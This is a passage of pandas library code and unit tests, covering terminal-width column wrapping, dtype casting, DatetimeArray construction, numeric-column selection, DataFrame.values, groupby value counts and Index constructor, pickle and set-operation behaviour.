col_bins = _binify(col_widths, lwidth)
nbins = len(col_bins)
if self.fmt.is_truncated_vertically:
assert self.fmt.max_rows_fitted is not None
nrows = self.fmt.max_rows_fitted + 1
else:
nrows = len(self.frame)
str_lst = []
start = 0
for i, end in enumerate(col_bins):
row = strcols[start:end]
if self.fmt.index:
row.insert(0, idx)
if nbins > 1:
if end <= len(strcols) and i < nbins - 1:
row.append([" \\"] + [" "] * (nrows - 1))
else:
row.append([" "] * nrows)
str_lst.append(self.adj.adjoin(adjoin_width, *row))
start = end
return "\n\n".join(str_lst)
def _fit_strcols_to_terminal_width(self, strcols: list[list[str]]) -> str:
from pandas import Series
lines = self.adj.adjoin(1, *strcols).split("\n")
max_len = Series(lines).str.len().max()
# plus truncate dot col
width, _ = get_terminal_size()
dif = max_len - width
# '+ 1' to avoid too wide repr (GH PR #17023)
adj_dif = dif + 1
col_lens = Series([Series(ele).apply(len).max() for ele in strcols])
n_cols = len(col_lens)
counter = 0
while adj_dif > 0 and n_cols > 1:
counter += 1
mid = round(n_cols / 2)
mid_ix = col_lens.index[mid]
col_len = col_lens[mid_ix]
# adjoin adds one
adj_dif -= col_len + 1
col_lens = col_lens.drop(mid_ix)
n_cols = len(col_lens)
# subtract index column
max_cols_fitted = n_cols - self.fmt.index
# GH-21180. Ensure that we print at least two columns.
max_cols_fitted = max(max_cols_fitted, 2)
self.fmt.max_cols_fitted = max_cols_fitted
# Call again _truncate to cut frame appropriately
# and then generate string representation
self.fmt.truncate()
strcols = self._get_strcols()
return self.adj.adjoin(1, *strcols)
def _binify(cols: list[int], line_width: int) -> list[int]:
adjoin_width = 1
bins = []
curr_width = 0
i_last_column = len(cols) - 1
for i, w in enumerate(cols):
w_adjoined = w + adjoin_width
curr_width += w_adjoined
if i_last_column == i:
wrap = curr_width + 1 > line_width and i > 0
else:
wrap = curr_width + 2 > line_width and i > 0
if wrap:
bins.append(i)
curr_width = w_adjoined
bins.append(len(cols))
return bins
```
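An illustrative sketch (not from the source tree) of how `_binify` and `_join_multiline` show up through the public `DataFrame.to_string(line_width=...)` path: columns that do not fit the requested width are split into chunks separated by blank lines, and every chunk but the last carries a trailing backslash continuation marker. Column names and widths here are arbitrary.

```python
import numpy as np
import pandas as pd

# A frame whose one-line repr is wider than the 20-character budget below.
df = pd.DataFrame(np.arange(12).reshape(3, 4),
                  columns=["alpha", "beta", "gamma", "delta"])

wrapped = df.to_string(line_width=20)

# _join_multiline joins each column bin separately and separates the
# resulting chunks with a blank line.
chunks = wrapped.split("\n\n")
assert len(chunks) >= 2

# Every chunk except the last carries the continuation marker.
assert "\\" in chunks[0]
assert "\\" not in chunks[-1]
```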
#### File: arrays/categorical/test_astype.py
```python
import numpy as np
import pytest
from pandas import (
Categorical,
CategoricalDtype,
NaT,
Timestamp,
array,
to_datetime,
)
import pandas._testing as tm
class TestAstype:
def test_astype_str_int_categories_to_nullable_int(self):
# GH#39616
dtype = CategoricalDtype([str(i) for i in range(5)])
codes = np.random.randint(5, size=20)
arr = Categorical.from_codes(codes, dtype=dtype)
res = arr.astype("Int64")
expected = array(codes, dtype="Int64")
tm.assert_extension_array_equal(res, expected)
@pytest.mark.parametrize("ordered", [True, False])
def test_astype(self, ordered):
# string
cat = Categorical(list("abbaaccc"), ordered=ordered)
result = cat.astype(object)
expected = np.array(cat)
tm.assert_numpy_array_equal(result, expected)
msg = r"Cannot cast object dtype to float64"
with pytest.raises(ValueError, match=msg):
cat.astype(float)
# numeric
cat = Categorical([0, 1, 2, 2, 1, 0, 1, 0, 2], ordered=ordered)
result = cat.astype(object)
expected = np.array(cat, dtype=object)
tm.assert_numpy_array_equal(result, expected)
result = cat.astype(int)
expected = np.array(cat, dtype="int")
tm.assert_numpy_array_equal(result, expected)
result = cat.astype(float)
expected = np.array(cat, dtype=float)
tm.assert_numpy_array_equal(result, expected)
@pytest.mark.parametrize("dtype_ordered", [True, False])
@pytest.mark.parametrize("cat_ordered", [True, False])
def test_astype_category(self, dtype_ordered, cat_ordered):
# GH#10696/GH#18593
data = list("abcaacbab")
cat = Categorical(data, categories=list("bac"), ordered=cat_ordered)
# standard categories
dtype = CategoricalDtype(ordered=dtype_ordered)
result = cat.astype(dtype)
expected = Categorical(data, categories=cat.categories, ordered=dtype_ordered)
tm.assert_categorical_equal(result, expected)
# non-standard categories
dtype = CategoricalDtype(list("adc"), dtype_ordered)
result = cat.astype(dtype)
expected = Categorical(data, dtype=dtype)
tm.assert_categorical_equal(result, expected)
if dtype_ordered is False:
# dtype='category' can't specify ordered, so only test once
result = cat.astype("category")
expected = cat
tm.assert_categorical_equal(result, expected)
def test_astype_object_datetime_categories(self):
# GH#40754
cat = Categorical(to_datetime(["2021-03-27", NaT]))
result = cat.astype(object)
expected = np.array([Timestamp("2021-03-27 00:00:00"), NaT], dtype="object")
tm.assert_numpy_array_equal(result, expected)
def test_astype_object_timestamp_categories(self):
# GH#18024
cat = Categorical([Timestamp("2014-01-01")])
result = cat.astype(object)
expected = np.array([Timestamp("2014-01-01 00:00:00")], dtype="object")
tm.assert_numpy_array_equal(result, expected)
```
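As a standalone illustration of the GH#39616 behaviour tested above, the sketch below (assuming a pandas release that supports the nullable "Int64" cast, roughly 1.2 onwards) converts string categories straight into a nullable integer array.

```python
import pandas as pd

# Categories are the strings "0".."4"; the codes pick them out of order.
cat = pd.Categorical.from_codes([0, 2, 4, 1],
                                categories=[str(i) for i in range(5)])

# astype("Int64") parses the string categories and preserves the order
# implied by the codes, producing a nullable integer ExtensionArray.
res = cat.astype("Int64")
assert str(res.dtype) == "Int64"
assert list(res) == [0, 2, 4, 1]
```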
#### File: arrays/datetimes/test_constructors.py
```python
import numpy as np
import pytest
from pandas.core.dtypes.dtypes import DatetimeTZDtype
import pandas as pd
import pandas._testing as tm
from pandas.core.arrays import DatetimeArray
from pandas.core.arrays.datetimes import _sequence_to_dt64ns
class TestDatetimeArrayConstructor:
def test_from_sequence_invalid_type(self):
mi = pd.MultiIndex.from_product([np.arange(5), np.arange(5)])
with pytest.raises(TypeError, match="Cannot create a DatetimeArray"):
DatetimeArray._from_sequence(mi)
def test_only_1dim_accepted(self):
arr = np.array([0, 1, 2, 3], dtype="M8[h]").astype("M8[ns]")
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 3-dim, we allow 2D to sneak in for ops purposes GH#29853
DatetimeArray(arr.reshape(2, 2, 1))
with pytest.raises(ValueError, match="Only 1-dimensional"):
# 0-dim
DatetimeArray(arr[[0]].squeeze())
def test_freq_validation(self):
# GH#24623 check that invalid instances cannot be created with the
# public constructor
arr = np.arange(5, dtype=np.int64) * 3600 * 10**9
msg = (
"Inferred frequency H from passed values does not "
"conform to passed frequency W-SUN"
)
with pytest.raises(ValueError, match=msg):
DatetimeArray(arr, freq="W")
@pytest.mark.parametrize(
"meth",
[
DatetimeArray._from_sequence,
_sequence_to_dt64ns,
pd.to_datetime,
pd.DatetimeIndex,
],
)
def test_mixing_naive_tzaware_raises(self, meth):
# GH#24569
arr = np.array([pd.Timestamp("2000"), pd.Timestamp("2000", tz="CET")])
msg = (
"Cannot mix tz-aware with tz-naive values|"
"Tz-aware datetime.datetime cannot be converted "
"to datetime64 unless utc=True"
)
for obj in [arr, arr[::-1]]:
# check that we raise regardless of whether naive is found
# before aware or vice-versa
with pytest.raises(ValueError, match=msg):
meth(obj)
def test_from_pandas_array(self):
arr = pd.array(np.arange(5, dtype=np.int64)) * 3600 * 10**9
result = DatetimeArray._from_sequence(arr)._with_freq("infer")
expected = pd.date_range("1970-01-01", periods=5, freq="H")._data
tm.assert_datetime_array_equal(result, expected)
def test_mismatched_timezone_raises(self):
arr = DatetimeArray(
np.array(["2000-01-01T06:00:00"], dtype="M8[ns]"),
dtype=DatetimeTZDtype(tz="US/Central"),
)
dtype = DatetimeTZDtype(tz="US/Eastern")
with pytest.raises(TypeError, match="Timezone of the array"):
DatetimeArray(arr, dtype=dtype)
def test_non_array_raises(self):
with pytest.raises(ValueError, match="list"):
DatetimeArray([1, 2, 3])
def test_bool_dtype_raises(self):
arr = np.array([1, 2, 3], dtype="bool")
with pytest.raises(
ValueError, match="The dtype of 'values' is incorrect.*bool"
):
DatetimeArray(arr)
msg = r"dtype bool cannot be converted to datetime64\[ns\]"
with pytest.raises(TypeError, match=msg):
DatetimeArray._from_sequence(arr)
with pytest.raises(TypeError, match=msg):
_sequence_to_dt64ns(arr)
with pytest.raises(TypeError, match=msg):
pd.DatetimeIndex(arr)
with pytest.raises(TypeError, match=msg):
pd.to_datetime(arr)
def test_incorrect_dtype_raises(self):
with pytest.raises(ValueError, match="Unexpected value for 'dtype'."):
DatetimeArray(np.array([1, 2, 3], dtype="i8"), dtype="category")
def test_freq_infer_raises(self):
with pytest.raises(ValueError, match="Frequency inference"):
DatetimeArray(np.array([1, 2, 3], dtype="i8"), freq="infer")
def test_copy(self):
data = np.array([1, 2, 3], dtype="M8[ns]")
arr = DatetimeArray(data, copy=False)
assert arr._data is data
arr = DatetimeArray(data, copy=True)
assert arr._data is not data
class TestSequenceToDT64NS:
def test_tz_dtype_mismatch_raises(self):
arr = DatetimeArray._from_sequence(
["2000"], dtype=DatetimeTZDtype(tz="US/Central")
)
with pytest.raises(TypeError, match="data is already tz-aware"):
_sequence_to_dt64ns(arr, dtype=DatetimeTZDtype(tz="UTC"))
def test_tz_dtype_matches(self):
arr = DatetimeArray._from_sequence(
["2000"], dtype=DatetimeTZDtype(tz="US/Central")
)
result, _, _ = _sequence_to_dt64ns(arr, dtype=DatetimeTZDtype(tz="US/Central"))
tm.assert_numpy_array_equal(arr._data, result)
@pytest.mark.parametrize("order", ["F", "C"])
def test_2d(self, order):
dti = pd.date_range("2016-01-01", periods=6, tz="US/Pacific")
arr = np.array(dti, dtype=object).reshape(3, 2)
if order == "F":
arr = arr.T
res = _sequence_to_dt64ns(arr)
expected = _sequence_to_dt64ns(arr.ravel())
tm.assert_numpy_array_equal(res[0].ravel(), expected[0])
assert res[1] == expected[1]
assert res[2] == expected[2]
res = DatetimeArray._from_sequence(arr)
expected = DatetimeArray._from_sequence(arr.ravel()).reshape(arr.shape)
tm.assert_datetime_array_equal(res, expected)
```
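The naive/aware mixing rule asserted in `test_mixing_naive_tzaware_raises` is visible through the public constructors as well. A small hedged sketch (timestamps chosen arbitrarily):

```python
import pandas as pd

naive = pd.Timestamp("2000-01-01")
aware = pd.Timestamp("2000-01-01", tz="CET")

# Mixing naive and tz-aware values is rejected regardless of which
# flavour comes first (GH#24569).
for values in ([naive, aware], [aware, naive]):
    try:
        pd.DatetimeIndex(values)
    except ValueError as err:
        assert "tz-aware" in str(err).lower()
    else:
        raise AssertionError("expected ValueError for mixed tz-awareness")
```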
#### File: frame/methods/test_get_numeric_data.py
```python
import numpy as np
import pandas as pd
from pandas import (
Categorical,
DataFrame,
Index,
Series,
Timestamp,
)
import pandas._testing as tm
from pandas.core.arrays import IntervalArray
class TestGetNumericData:
def test_get_numeric_data_preserve_dtype(self):
# get the numeric data
obj = DataFrame({"A": [1, "2", 3.0]})
result = obj._get_numeric_data()
expected = DataFrame(index=[0, 1, 2], dtype=object)
tm.assert_frame_equal(result, expected)
def test_get_numeric_data(self):
datetime64name = np.dtype("M8[ns]").name
objectname = np.dtype(np.object_).name
df = DataFrame(
{"a": 1.0, "b": 2, "c": "foo", "f": Timestamp("20010102")},
index=np.arange(10),
)
result = df.dtypes
expected = Series(
[
np.dtype("float64"),
np.dtype("int64"),
np.dtype(objectname),
np.dtype(datetime64name),
],
index=["a", "b", "c", "f"],
)
tm.assert_series_equal(result, expected)
df = DataFrame(
{
"a": 1.0,
"b": 2,
"c": "foo",
"d": np.array([1.0] * 10, dtype="float32"),
"e": np.array([1] * 10, dtype="int32"),
"f": np.array([1] * 10, dtype="int16"),
"g": Timestamp("20010102"),
},
index=np.arange(10),
)
result = df._get_numeric_data()
expected = df.loc[:, ["a", "b", "d", "e", "f"]]
tm.assert_frame_equal(result, expected)
only_obj = df.loc[:, ["c", "g"]]
result = only_obj._get_numeric_data()
expected = df.loc[:, []]
tm.assert_frame_equal(result, expected)
df = DataFrame.from_dict({"a": [1, 2], "b": ["foo", "bar"], "c": [np.pi, np.e]})
result = df._get_numeric_data()
expected = DataFrame.from_dict({"a": [1, 2], "c": [np.pi, np.e]})
tm.assert_frame_equal(result, expected)
df = result.copy()
result = df._get_numeric_data()
expected = df
tm.assert_frame_equal(result, expected)
def test_get_numeric_data_mixed_dtype(self):
# numeric and object columns
df = DataFrame(
{
"a": [1, 2, 3],
"b": [True, False, True],
"c": ["foo", "bar", "baz"],
"d": [None, None, None],
"e": [3.14, 0.577, 2.773],
}
)
result = df._get_numeric_data()
tm.assert_index_equal(result.columns, Index(["a", "b", "e"]))
def test_get_numeric_data_extension_dtype(self):
# GH#22290
df = DataFrame(
{
"A": pd.array([-10, np.nan, 0, 10, 20, 30], dtype="Int64"),
"B": Categorical(list("abcabc")),
"C": pd.array([0, 1, 2, 3, np.nan, 5], dtype="UInt8"),
"D": IntervalArray.from_breaks(range(7)),
}
)
result = df._get_numeric_data()
expected = df.loc[:, ["A", "C"]]
tm.assert_frame_equal(result, expected)
```
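The tests above exercise the private `DataFrame._get_numeric_data` helper. The sketch below (illustrative only, with made-up column names) contrasts it with the public `select_dtypes`: the private helper keeps boolean columns, which `select_dtypes(include="number")` does not.

```python
import pandas as pd

df = pd.DataFrame(
    {
        "ints": [1, 2, 3],
        "flags": [True, False, True],
        "words": ["foo", "bar", "baz"],
        "floats": [3.14, 0.577, 2.718],
    }
)

# The private helper treats bools as numeric ...
numeric = df._get_numeric_data()
assert list(numeric.columns) == ["ints", "flags", "floats"]

# ... whereas the public select_dtypes with "number" excludes them.
assert list(df.select_dtypes(include="number").columns) == ["ints", "floats"]
```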
#### File: frame/methods/test_values.py
```python
import numpy as np
import pytest
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
NaT,
Series,
Timestamp,
date_range,
period_range,
)
import pandas._testing as tm
class TestDataFrameValues:
@td.skip_array_manager_invalid_test
def test_values(self, float_frame):
float_frame.values[:, 0] = 5.0
assert (float_frame.values[:, 0] == 5).all()
def test_more_values(self, float_string_frame):
values = float_string_frame.values
assert values.shape[1] == len(float_string_frame.columns)
def test_values_mixed_dtypes(self, float_frame, float_string_frame):
frame = float_frame
arr = frame.values
frame_cols = frame.columns
for i, row in enumerate(arr):
for j, value in enumerate(row):
col = frame_cols[j]
if np.isnan(value):
assert np.isnan(frame[col][i])
else:
assert value == frame[col][i]
# mixed type
arr = float_string_frame[["foo", "A"]].values
assert arr[0, 0] == "bar"
df = DataFrame({"complex": [1j, 2j, 3j], "real": [1, 2, 3]})
arr = df.values
assert arr[0, 0] == 1j
def test_values_duplicates(self):
df = DataFrame(
[[1, 2, "a", "b"], [1, 2, "a", "b"]], columns=["one", "one", "two", "two"]
)
result = df.values
expected = np.array([[1, 2, "a", "b"], [1, 2, "a", "b"]], dtype=object)
tm.assert_numpy_array_equal(result, expected)
def test_values_with_duplicate_columns(self):
df = DataFrame([[1, 2.5], [3, 4.5]], index=[1, 2], columns=["x", "x"])
result = df.values
expected = np.array([[1, 2.5], [3, 4.5]])
assert (result == expected).all().all()
@pytest.mark.parametrize("constructor", [date_range, period_range])
def test_values_casts_datetimelike_to_object(self, constructor):
series = Series(constructor("2000-01-01", periods=10, freq="D"))
expected = series.astype("object")
df = DataFrame({"a": series, "b": np.random.randn(len(series))})
result = df.values.squeeze()
assert (result[:, 0] == expected.values).all()
df = DataFrame({"a": series, "b": ["foo"] * len(series)})
result = df.values.squeeze()
assert (result[:, 0] == expected.values).all()
def test_frame_values_with_tz(self):
tz = "US/Central"
df = DataFrame({"A": date_range("2000", periods=4, tz=tz)})
result = df.values
expected = np.array(
[
[Timestamp("2000-01-01", tz=tz)],
[Timestamp("2000-01-02", tz=tz)],
[Timestamp("2000-01-03", tz=tz)],
[Timestamp("2000-01-04", tz=tz)],
]
)
tm.assert_numpy_array_equal(result, expected)
# two columns, homogeneous
df["B"] = df["A"]
result = df.values
expected = np.concatenate([expected, expected], axis=1)
tm.assert_numpy_array_equal(result, expected)
# three columns, heterogeneous
est = "US/Eastern"
df["C"] = df["A"].dt.tz_convert(est)
new = np.array(
[
[Timestamp("2000-01-01T01:00:00", tz=est)],
[Timestamp("2000-01-02T01:00:00", tz=est)],
[Timestamp("2000-01-03T01:00:00", tz=est)],
[Timestamp("2000-01-04T01:00:00", tz=est)],
]
)
expected = np.concatenate([expected, new], axis=1)
result = df.values
tm.assert_numpy_array_equal(result, expected)
def test_interleave_with_tzaware(self, timezone_frame):
# interleave with object
result = timezone_frame.assign(D="foo").values
expected = np.array(
[
[
Timestamp("2013-01-01 00:00:00"),
Timestamp("2013-01-02 00:00:00"),
Timestamp("2013-01-03 00:00:00"),
],
[
Timestamp("2013-01-01 00:00:00-0500", tz="US/Eastern"),
NaT,
Timestamp("2013-01-03 00:00:00-0500", tz="US/Eastern"),
],
[
Timestamp("2013-01-01 00:00:00+0100", tz="CET"),
NaT,
Timestamp("2013-01-03 00:00:00+0100", tz="CET"),
],
["foo", "foo", "foo"],
],
dtype=object,
).T
tm.assert_numpy_array_equal(result, expected)
# interleave with only datetime64[ns]
result = timezone_frame.values
expected = np.array(
[
[
Timestamp("2013-01-01 00:00:00"),
Timestamp("2013-01-02 00:00:00"),
Timestamp("2013-01-03 00:00:00"),
],
[
Timestamp("2013-01-01 00:00:00-0500", tz="US/Eastern"),
NaT,
Timestamp("2013-01-03 00:00:00-0500", tz="US/Eastern"),
],
[
Timestamp("2013-01-01 00:00:00+0100", tz="CET"),
NaT,
Timestamp("2013-01-03 00:00:00+0100", tz="CET"),
],
],
dtype=object,
).T
tm.assert_numpy_array_equal(result, expected)
def test_values_interleave_non_unique_cols(self):
df = DataFrame(
[[Timestamp("20130101"), 3.5], [Timestamp("20130102"), 4.5]],
columns=["x", "x"],
index=[1, 2],
)
df_unique = df.copy()
df_unique.columns = ["x", "y"]
assert df_unique.values.shape == df.values.shape
tm.assert_numpy_array_equal(df_unique.values[0], df.values[0])
tm.assert_numpy_array_equal(df_unique.values[1], df.values[1])
def test_values_numeric_cols(self, float_frame):
float_frame["foo"] = "bar"
values = float_frame[["A", "B", "C", "D"]].values
assert values.dtype == np.float64
def test_values_lcd(self, mixed_float_frame, mixed_int_frame):
# mixed lcd
values = mixed_float_frame[["A", "B", "C", "D"]].values
assert values.dtype == np.float64
values = mixed_float_frame[["A", "B", "C"]].values
assert values.dtype == np.float32
values = mixed_float_frame[["C"]].values
assert values.dtype == np.float16
# GH#10364
# B uint64 forces float because there are other signed int types
values = mixed_int_frame[["A", "B", "C", "D"]].values
assert values.dtype == np.float64
values = mixed_int_frame[["A", "D"]].values
assert values.dtype == np.int64
# B uint64 forces float because there are other signed int types
values = mixed_int_frame[["A", "B", "C"]].values
assert values.dtype == np.float64
# as B and C are both unsigned, no forcing to float is needed
values = mixed_int_frame[["B", "C"]].values
assert values.dtype == np.uint64
values = mixed_int_frame[["A", "C"]].values
assert values.dtype == np.int32
values = mixed_int_frame[["C", "D"]].values
assert values.dtype == np.int64
values = mixed_int_frame[["A"]].values
assert values.dtype == np.int32
values = mixed_int_frame[["C"]].values
assert values.dtype == np.uint8
class TestPrivateValues:
@td.skip_array_manager_invalid_test
def test_private_values_dt64tz(self):
dta = date_range("2000", periods=4, tz="US/Central")._data.reshape(-1, 1)
df = DataFrame(dta, columns=["A"])
tm.assert_equal(df._values, dta)
# we have a view
assert np.shares_memory(df._values._ndarray, dta._ndarray)
# TimedeltaArray
tda = dta - dta
df2 = df - df
tm.assert_equal(df2._values, tda)
@td.skip_array_manager_invalid_test
def test_private_values_dt64tz_multicol(self):
dta = date_range("2000", periods=8, tz="US/Central")._data.reshape(-1, 2)
df = DataFrame(dta, columns=["A", "B"])
tm.assert_equal(df._values, dta)
# we have a view
assert np.shares_memory(df._values._ndarray, dta._ndarray)
# TimedeltaArray
tda = dta - dta
df2 = df - df
tm.assert_equal(df2._values, tda)
def test_private_values_dt64_multiblock(self, using_array_manager, request):
if using_array_manager:
mark = pytest.mark.xfail(reason="returns ndarray")
request.node.add_marker(mark)
dta = date_range("2000", periods=8)._data
df = DataFrame({"A": dta[:4]}, copy=False)
df["B"] = dta[4:]
assert len(df._mgr.arrays) == 2
result = df._values
expected = dta.reshape(2, 4).T
tm.assert_equal(result, expected)
```
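To make the "lowest common dtype" behaviour from `test_values_lcd` concrete, here is a short sketch with hand-picked dtypes (not taken from the fixtures used above):

```python
import numpy as np
import pandas as pd

df = pd.DataFrame(
    {
        "f64": np.array([1.0, 2.0], dtype="float64"),
        "f32": np.array([1.5, 2.5], dtype="float32"),
        "i64": np.array([1, 2], dtype="int64"),
        "u64": np.array([1, 2], dtype="uint64"),
    }
)

# .values returns a single ndarray, so mixed columns are upcast to the
# smallest dtype that can hold every selected column.
assert df[["f32", "f64"]].values.dtype == np.float64
assert df[["i64"]].values.dtype == np.int64

# int64 together with uint64 has no common integer dtype, so the result
# falls back to float64 -- the same rule the GH#10364 cases assert above.
assert df[["i64", "u64"]].values.dtype == np.float64
```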
#### File: tests/groupby/test_value_counts.py
```python
from itertools import product
import numpy as np
import pytest
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
Grouper,
MultiIndex,
Series,
date_range,
to_datetime,
)
import pandas._testing as tm
# our starting frame
def seed_df(seed_nans, n, m):
np.random.seed(1234)
days = date_range("2015-08-24", periods=10)
frame = DataFrame(
{
"1st": np.random.choice(list("abcd"), n),
"2nd": np.random.choice(days, n),
"3rd": np.random.randint(1, m + 1, n),
}
)
if seed_nans:
frame.loc[1::11, "1st"] = np.nan
frame.loc[3::17, "2nd"] = np.nan
frame.loc[7::19, "3rd"] = np.nan
frame.loc[8::19, "3rd"] = np.nan
frame.loc[9::19, "3rd"] = np.nan
return frame
# create input df, keys, and the bins
binned = []
ids = []
for seed_nans in [True, False]:
for n, m in product((100, 1000), (5, 20)):
df = seed_df(seed_nans, n, m)
bins = None, np.arange(0, max(5, df["3rd"].max()) + 1, 2)
keys = "1st", "2nd", ["1st", "2nd"]
for k, b in product(keys, bins):
binned.append((df, k, b, n, m))
ids.append(f"{k}-{n}-{m}")
@pytest.mark.slow
@pytest.mark.parametrize("df, keys, bins, n, m", binned, ids=ids)
@pytest.mark.parametrize("isort", [True, False])
@pytest.mark.parametrize("normalize", [True, False])
@pytest.mark.parametrize("sort", [True, False])
@pytest.mark.parametrize("ascending", [True, False])
@pytest.mark.parametrize("dropna", [True, False])
def test_series_groupby_value_counts(
df, keys, bins, n, m, isort, normalize, sort, ascending, dropna
):
def rebuild_index(df):
arr = list(map(df.index.get_level_values, range(df.index.nlevels)))
df.index = MultiIndex.from_arrays(arr, names=df.index.names)
return df
kwargs = {
"normalize": normalize,
"sort": sort,
"ascending": ascending,
"dropna": dropna,
"bins": bins,
}
gr = df.groupby(keys, sort=isort)
left = gr["3rd"].value_counts(**kwargs)
gr = df.groupby(keys, sort=isort)
right = gr["3rd"].apply(Series.value_counts, **kwargs)
right.index.names = right.index.names[:-1] + ["3rd"]
# have to sort on index because of unstable sort on values
left, right = map(rebuild_index, (left, right)) # xref GH9212
tm.assert_series_equal(left.sort_index(), right.sort_index())
def test_series_groupby_value_counts_with_grouper():
# GH28479
df = DataFrame(
{
"Timestamp": [
1565083561,
1565083561 + 86400,
1565083561 + 86500,
1565083561 + 86400 * 2,
1565083561 + 86400 * 3,
1565083561 + 86500 * 3,
1565083561 + 86400 * 4,
],
"Food": ["apple", "apple", "banana", "banana", "orange", "orange", "pear"],
}
).drop([3])
df["Datetime"] = to_datetime(df["Timestamp"].apply(lambda t: str(t)), unit="s")
dfg = df.groupby(Grouper(freq="1D", key="Datetime"))
# have to sort on index because of unstable sort on values xref GH9212
result = dfg["Food"].value_counts().sort_index()
expected = dfg["Food"].apply(Series.value_counts).sort_index()
expected.index.names = result.index.names
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("columns", [["A", "B"], ["A", "B", "C"]])
def test_series_groupby_value_counts_empty(columns):
# GH39172
df = DataFrame(columns=columns)
dfg = df.groupby(columns[:-1])
result = dfg[columns[-1]].value_counts()
expected = Series([], name=columns[-1], dtype=result.dtype)
expected.index = MultiIndex.from_arrays([[]] * len(columns), names=columns)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("columns", [["A", "B"], ["A", "B", "C"]])
def test_series_groupby_value_counts_one_row(columns):
# GH42618
df = DataFrame(data=[range(len(columns))], columns=columns)
dfg = df.groupby(columns[:-1])
result = dfg[columns[-1]].value_counts()
expected = df.value_counts().rename(columns[-1])
tm.assert_series_equal(result, expected)
def test_series_groupby_value_counts_on_categorical():
# GH38672
s = Series(Categorical(["a"], categories=["a", "b"]))
result = s.groupby([0]).value_counts()
expected = Series(
data=[1, 0],
index=MultiIndex.from_arrays(
[
[0, 0],
CategoricalIndex(
["a", "b"], categories=["a", "b"], ordered=False, dtype="category"
),
]
),
name=0,
)
# Expected:
# 0 a 1
# b 0
# Name: 0, dtype: int64
tm.assert_series_equal(result, expected)
```
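The parametrized test above boils down to one invariant: `SeriesGroupBy.value_counts` should agree with the slower `apply(Series.value_counts)` spelling. A compact sketch of that invariant on a toy frame (column names are arbitrary):

```python
import pandas as pd

df = pd.DataFrame(
    {
        "key": ["a", "a", "a", "b", "b"],
        "val": [1, 1, 2, 2, 2],
    }
)

# Counts of "val" within each "key" group ...
result = df.groupby("key")["val"].value_counts()

# ... must match the per-group Series.value_counts applied explicitly.
expected = df.groupby("key")["val"].apply(pd.Series.value_counts)
expected.index.names = result.index.names

# Sort on the index first, since ties in the counts make the value order
# unstable (the same trick the tests use, xref GH9212).
assert result.sort_index().equals(expected.sort_index())
```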
#### File: indexes/base_class/test_constructors.py
```python
import numpy as np
import pytest
from pandas import (
Index,
MultiIndex,
)
import pandas._testing as tm
class TestIndexConstructor:
# Tests for the Index constructor, specifically for cases that do
# not return a subclass
@pytest.mark.parametrize("value", [1, np.int64(1)])
def test_constructor_corner(self, value):
# corner case
msg = (
r"Index\(\.\.\.\) must be called with a collection of some "
f"kind, {value} was passed"
)
with pytest.raises(TypeError, match=msg):
Index(value)
@pytest.mark.parametrize("index_vals", [[("A", 1), "B"], ["B", ("A", 1)]])
def test_construction_list_mixed_tuples(self, index_vals):
# see gh-10697: if we are constructing from a mixed list of tuples,
# make sure that we are independent of the sorting order.
index = Index(index_vals)
assert isinstance(index, Index)
assert not isinstance(index, MultiIndex)
def test_constructor_wrong_kwargs(self):
# GH #19348
with pytest.raises(TypeError, match="Unexpected keyword arguments {'foo'}"):
with tm.assert_produces_warning(FutureWarning):
Index([], foo="bar")
def test_constructor_cast(self):
msg = "could not convert string to float"
with pytest.raises(ValueError, match=msg):
Index(["a", "b", "c"], dtype=float)
```
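Two of the corner cases above, restated outside pytest as a quick sketch:

```python
import pandas as pd

# A scalar is not a collection, so the Index constructor rejects it.
try:
    pd.Index(1)
except TypeError as err:
    assert "collection" in str(err)
else:
    raise AssertionError("expected TypeError for a scalar input")

# A list mixing tuples and scalars stays a flat object-dtype Index
# rather than being promoted to a MultiIndex (gh-10697).
idx = pd.Index([("A", 1), "B"])
assert isinstance(idx, pd.Index) and not isinstance(idx, pd.MultiIndex)
assert idx.dtype == object
```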
#### File: indexes/base_class/test_pickle.py
```python
from pandas import Index
import pandas._testing as tm
def test_pickle_preserves_object_dtype():
# GH#43188, GH#43155 don't infer numeric dtype
index = Index([1, 2, 3], dtype=object)
result = tm.round_trip_pickle(index)
assert result.dtype == object
tm.assert_index_equal(index, result)
```
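The same round trip can be written with the standard-library pickle module directly; a minimal sketch of the GH#43188/GH#43155 guarantee the test relies on:

```python
import pickle
import pandas as pd

# Force object dtype even though every element is an integer.
idx = pd.Index([1, 2, 3], dtype=object)
assert idx.dtype == object

# A pickle round trip must not silently re-infer an int64 dtype.
restored = pickle.loads(pickle.dumps(idx))
assert restored.dtype == object
assert restored.equals(idx)
```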
#### File: indexes/base_class/test_setops.py
```python
from datetime import datetime
import numpy as np
import pytest
import pandas as pd
from pandas import (
Index,
Series,
)
import pandas._testing as tm
from pandas.core.algorithms import safe_sort
class TestIndexSetOps:
@pytest.mark.parametrize(
"method", ["union", "intersection", "difference", "symmetric_difference"]
)
def test_setops_disallow_true(self, method):
idx1 = Index(["a", "b"])
idx2 = Index(["b", "c"])
with pytest.raises(ValueError, match="The 'sort' keyword only takes"):
getattr(idx1, method)(idx2, sort=True)
def test_setops_preserve_object_dtype(self):
idx = Index([1, 2, 3], dtype=object)
result = idx.intersection(idx[1:])
expected = idx[1:]
tm.assert_index_equal(result, expected)
# if other is not monotonic increasing, intersection goes through
# a different route
result = idx.intersection(idx[1:][::-1])
tm.assert_index_equal(result, expected)
result = idx._union(idx[1:], sort=None)
expected = idx
tm.assert_numpy_array_equal(result, expected.values)
result = idx.union(idx[1:], sort=None)
tm.assert_index_equal(result, expected)
# if other is not monotonic increasing, _union goes through
# a different route
result = idx._union(idx[1:][::-1], sort=None)
tm.assert_numpy_array_equal(result, expected.values)
result = idx.union(idx[1:][::-1], sort=None)
tm.assert_index_equal(result, expected)
def test_union_base(self):
index = Index([0, "a", 1, "b", 2, "c"])
first = index[3:]
second = index[:5]
result = first.union(second)
expected = Index([0, 1, 2, "a", "b", "c"])
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize("klass", [np.array, Series, list])
def test_union_different_type_base(self, klass):
# GH 10149
index = Index([0, "a", 1, "b", 2, "c"])
first = index[3:]
second = index[:5]
result = first.union(klass(second.values))
assert tm.equalContents(result, index)
def test_union_sort_other_incomparable(self):
# https://github.com/pandas-dev/pandas/issues/24959
idx = Index([1, pd.Timestamp("2000")])
# default (sort=None)
with tm.assert_produces_warning(RuntimeWarning):
